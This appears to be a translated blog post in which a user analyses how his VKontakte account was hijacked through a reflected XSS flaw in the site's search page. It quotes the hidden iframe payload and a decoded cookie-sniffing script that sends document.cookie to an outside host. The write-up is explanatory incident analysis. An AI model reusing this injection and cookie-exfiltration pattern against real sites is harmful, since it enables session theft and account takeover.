
XSS VKontakte

Background (you can skip this)


I came home today and found 9 messages in my VKontakte inbox. Since I don't particularly like this site and don't visit it often, this was odd. In the messages, users wrote that spam was being sent from my account. Bad, but oh well, I changed the password and that was it... Still, I thought about it: the old password was 12 alphanumeric characters, practically impossible to brute-force. The computer is crystal clean and not infected... So what's going on?

Debriefing


I look at the text of the message sent on my behalf:
hello, it's not spam! I am writing to all my friends. Today I will delete my page, and I will move my words to the page . I am there under my own surname and name. So that's it.
And here I realise that my natural curiosity has let me down this time too. Yesterday a similar message came to me, and of course, sitting in Opera and feeling safe and secure, I followed the link. Now open that page (from a browser that is not logged in!) and look at the source. What do we see? A hidden floating frame is loaded in the page:
  <iframe src='http://%76%6b%6f%6e%74%61%6b%74%65%2e%72%75/gsearch.php?q=%27;()())//\%27;document.write(String.fromCharCode(60,115,99,114,105,112, [there were many more comma-separated digits here that stretched the page, so the moderators (the UFO) cut them out; if anyone really needs them, ask me in a private message] ))//%22;%3C%3E%22)//\%22;%3C%3E%22%3C%3E%22%22!---%22?%3E#c[q]=%27%3B()())%20%20\&c[section]=people' style='display:none;'></iframe>
The link leads to a percent-encoded "vkontakte.ru", to the script that performs the search. As you know, after the search runs, the text of the query is echoed back to the user; this, together with the lack of proper output filtering, is exactly what the spammers exploited here.
The JavaScript code is embedded in the query string; in this case it is the markup of another frame, encoded as a list of ASCII character codes:
  <script>document.write('<iframe src="http://webzer.vov.ru/s.php?dc='+document.cookie+'" style="display: none;"></iframe>');</script>
This is essentially a cookie sniffer, to which curious users like me hand over their vkontakte cookies.
The vulnerability is still present at the time of writing; a simple alert (tested in Opera) demonstrates it. It does not work in IE, because IE has no support for the "data:" protocol, and I am not an expert in writing exploits.

Some conclusions



UPD: The alert example stopped working 3.5 hours after publication. For those who did not get a chance to see it, a screenshot has been preserved.


Source: https://habr.com/ru/post/62283/

